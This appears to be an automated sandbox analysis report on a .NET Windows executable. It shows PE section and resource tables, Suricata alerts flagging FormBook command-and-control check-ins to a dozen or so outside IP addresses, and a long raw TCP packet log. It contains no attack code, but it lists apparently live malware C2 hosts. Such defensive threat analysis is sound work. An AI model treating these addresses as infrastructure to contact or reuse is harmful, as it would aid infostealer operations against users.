                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xc17f00xc180041b2c8f9bd53a53f4ba5874d1695784bFalse0.9061313993863049data7.711273899286818IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xc40000x24ec0x2600c0a86a11fae33068f1ee67074757015cFalse0.874280427631579data7.4341657896207165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xc80000xc0x200347b5b35754d8142bd2b6980e4162ed8False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc41000x1e7ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9827056110684089
                                                                                  RT_GROUP_ICON0xc5f900x14data1.05
                                                                                  RT_VERSION0xc5fb40x338data0.4368932038834951
                                                                                  RT_MANIFEST0xc62fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-09T06:56:16.750040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750023172.67.145.23480TCP
                                                                                  2024-12-09T06:56:58.918321+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74976685.159.66.9380TCP
                                                                                  2024-12-09T06:57:15.822187+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749805104.21.62.18480TCP
                                                                                  2024-12-09T06:57:15.822187+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.749805104.21.62.18480TCP
                                                                                  2024-12-09T06:57:18.480511+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749811104.21.62.18480TCP
                                                                                  2024-12-09T06:57:21.145822+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749820104.21.62.18480TCP
                                                                                  2024-12-09T06:57:23.798878+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749829104.21.62.18480TCP
                                                                                  2024-12-09T06:57:31.029390+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74984585.25.177.13880TCP
                                                                                  2024-12-09T06:57:33.693663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74985185.25.177.13880TCP
                                                                                  2024-12-09T06:57:36.368290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74986185.25.177.13880TCP
                                                                                  2024-12-09T06:57:39.033503+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74986885.25.177.13880TCP
                                                                                  2024-12-09T06:58:03.079877+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749923173.236.199.9780TCP
                                                                                  2024-12-09T06:58:05.808685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749929173.236.199.9780TCP
                                                                                  2024-12-09T06:58:08.417208+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749936173.236.199.9780TCP
                                                                                  2024-12-09T06:58:11.096549+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749945173.236.199.9780TCP
                                                                                  2024-12-09T06:58:18.242015+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749962203.161.42.7380TCP
                                                                                  2024-12-09T06:58:20.897896+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749968203.161.42.7380TCP
                                                                                  2024-12-09T06:58:23.583776+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749974203.161.42.7380TCP
                                                                                  2024-12-09T06:58:26.256367+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749984203.161.42.7380TCP
                                                                                  2024-12-09T06:58:33.671905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999446.30.211.3880TCP
                                                                                  2024-12-09T06:58:36.369431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999546.30.211.3880TCP
                                                                                  2024-12-09T06:58:39.013602+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999646.30.211.3880TCP
                                                                                  2024-12-09T06:58:41.691427+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74999746.30.211.3880TCP
                                                                                  2024-12-09T06:58:48.580782+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999877.68.64.4580TCP
                                                                                  2024-12-09T06:58:51.391842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999977.68.64.4580TCP
                                                                                  2024-12-09T06:58:54.138261+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75000077.68.64.4580TCP
                                                                                  2024-12-09T06:58:56.729532+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75000177.68.64.4580TCP
                                                                                  2024-12-09T06:59:04.694321+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750002146.88.233.11580TCP
                                                                                  2024-12-09T06:59:07.117800+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750003146.88.233.11580TCP
                                                                                  2024-12-09T06:59:09.805906+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750004146.88.233.11580TCP
                                                                                  2024-12-09T06:59:12.456335+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.750005146.88.233.11580TCP
                                                                                  2024-12-09T06:59:19.595436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750006217.160.0.20080TCP
                                                                                  2024-12-09T06:59:22.289922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750007217.160.0.20080TCP
                                                                                  2024-12-09T06:59:25.010391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750008217.160.0.20080TCP
                                                                                  2024-12-09T06:59:27.583945+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.750009217.160.0.20080TCP
                                                                                  2024-12-09T06:59:34.246688+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001013.248.169.4880TCP
                                                                                  2024-12-09T06:59:36.899515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001113.248.169.4880TCP
                                                                                  2024-12-09T06:59:39.564180+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001213.248.169.4880TCP
                                                                                  2024-12-09T06:59:42.233654+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75001313.248.169.4880TCP
                                                                                  2024-12-09T06:59:54.311479+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001481.2.196.1980TCP
                                                                                  2024-12-09T06:59:56.969568+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001581.2.196.1980TCP
                                                                                  2024-12-09T06:59:59.706100+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75001681.2.196.1980TCP
                                                                                  2024-12-09T07:00:02.298681+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75001781.2.196.1980TCP
                                                                                  2024-12-09T07:00:14.169395+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750018172.67.215.23580TCP
                                                                                  2024-12-09T07:00:16.710060+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750019172.67.215.23580TCP
                                                                                  2024-12-09T07:00:19.390029+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750020172.67.215.23580TCP
                                                                                  2024-12-09T07:00:22.050641+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.750021172.67.215.23580TCP
                                                                                  2024-12-09T07:00:28.970978+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750022172.67.145.23480TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 9, 2024 06:56:57.469186068 CET4976680192.168.2.785.159.66.93
                                                                                  Dec 9, 2024 06:56:57.588820934 CET804976685.159.66.93192.168.2.7
                                                                                  Dec 9, 2024 06:56:57.589106083 CET4976680192.168.2.785.159.66.93
                                                                                  Dec 9, 2024 06:56:57.600594997 CET4976680192.168.2.785.159.66.93
                                                                                  Dec 9, 2024 06:56:57.719938993 CET804976685.159.66.93192.168.2.7
                                                                                  Dec 9, 2024 06:56:58.918168068 CET804976685.159.66.93192.168.2.7
                                                                                  Dec 9, 2024 06:56:58.918265104 CET804976685.159.66.93192.168.2.7
                                                                                  Dec 9, 2024 06:56:58.918320894 CET4976680192.168.2.785.159.66.93
                                                                                  Dec 9, 2024 06:56:58.921864033 CET4976680192.168.2.785.159.66.93
                                                                                  Dec 9, 2024 06:56:59.041238070 CET804976685.159.66.93192.168.2.7
                                                                                  Dec 9, 2024 06:57:14.424127102 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:14.543855906 CET8049805104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:14.543970108 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:14.559535027 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:14.680629969 CET8049805104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:15.822072029 CET8049805104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:15.822108030 CET8049805104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:15.822186947 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:15.822228909 CET8049805104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:15.823726892 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:16.069725037 CET4980580192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:17.088164091 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:17.207597971 CET8049811104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:17.207700968 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:17.223403931 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:17.342914104 CET8049811104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:18.480420113 CET8049811104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:18.480447054 CET8049811104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:18.480474949 CET8049811104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:18.480510950 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:18.480510950 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:18.725341082 CET4981180192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:19.744509935 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:19.863832951 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:19.863945961 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:19.878730059 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:19.998119116 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:19.998143911 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:21.145694971 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:21.145733118 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:21.145822048 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:21.148466110 CET8049820104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:21.148515940 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:21.381894112 CET4982080192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:22.400794983 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:22.520114899 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:22.520236969 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:22.529239893 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:22.648479939 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:23.798679113 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:23.798736095 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:23.798877954 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:23.799168110 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:23.799226046 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:23.801923037 CET4982980192.168.2.7104.21.62.184
                                                                                  Dec 9, 2024 06:57:23.921300888 CET8049829104.21.62.184192.168.2.7
                                                                                  Dec 9, 2024 06:57:29.626789093 CET4984580192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:29.746042013 CET804984585.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:29.746112108 CET4984580192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:29.762391090 CET4984580192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:29.881700993 CET804984585.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:31.028702021 CET804984585.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:31.029352903 CET804984585.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:31.029390097 CET4984580192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:31.272361040 CET4984580192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:32.290904045 CET4985180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:32.411253929 CET804985185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:32.411380053 CET4985180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:32.428884983 CET4985180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:32.548190117 CET804985185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:33.693114042 CET804985185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:33.693571091 CET804985185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:33.693662882 CET4985180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:33.944204092 CET4985180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:34.962954998 CET4986180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:35.082180023 CET804986185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:35.082283974 CET4986180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:35.097094059 CET4986180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:35.216391087 CET804986185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:35.216532946 CET804986185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:36.367711067 CET804986185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:36.368172884 CET804986185.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:36.368289948 CET4986180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:36.600577116 CET4986180192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:37.619931936 CET4986880192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:37.739183903 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:37.739480972 CET4986880192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:37.748908997 CET4986880192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:37.868268013 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:39.032749891 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:39.033449888 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:57:39.033503056 CET4986880192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:39.035875082 CET4986880192.168.2.785.25.177.138
                                                                                  Dec 9, 2024 06:57:39.155069113 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:58:01.844461918 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:01.963877916 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:01.963974953 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:01.984894991 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:02.106012106 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.076719999 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.077564001 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.079876900 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:03.491265059 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.511780024 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.631115913 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:04.631191969 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.655942917 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.775336981 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808597088 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808614969 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808685064 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:06.163342953 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.185519934 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.304888010 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:07.305762053 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.321552038 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.440845966 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:07.440927029 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.416271925 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.417161942 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.417207956 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:08.835055113 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.854559898 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.973989010 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:09.974071026 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.988408089 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:10.107884884 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.095673084 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.096092939 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.096549034 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:11.099600077 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:11.218801022 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:16.874321938 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:16.993545055 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:16.993690014 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:17.011692047 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:17.130954027 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241955042 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241981983 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241996050 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242014885 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242103100 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242117882 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242136002 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242146015 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242153883 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242166996 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242172003 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242178917 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242202997 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.245033979 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.245083094 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.361330986 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.361355066 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.361392975 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.365489006 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.365590096 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.365633011 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.436738014 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.436813116 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.436857939 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.439419031 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.439460993 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.522615910 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.545566082 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.664870024 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:19.665679932 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.680959940 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.800364971 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897641897 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897675991 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897687912 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897701979 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897713900 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897810936 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897826910 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897896051 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.897927999 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897945881 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897948027 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.897959948 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897977114 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.898016930 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.017460108 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.017499924 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.021528006 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.021576881 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.071903944 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.089500904 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.089534998 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.092156887 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.092217922 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.099603891 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.197587967 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.214802027 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.334183931 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:22.334270954 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.353539944 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.473123074 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:22.473140001 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583564997 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583623886 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583637953 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583739996 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583751917 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583762884 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583775997 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.583800077 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583811045 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.583815098 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583879948 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583906889 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.584009886 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.584115028 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.703191042 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.703237057 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.707307100 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.707360029 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.757602930 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.775511980 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.775584936 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.778218031 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.778249979 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.785609961 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.869602919 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:24.894171000 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.014885902 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:25.021647930 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.029637098 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.148929119 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256148100 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256181955 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256195068 CET8049984203.161.42.73192.168.2.7
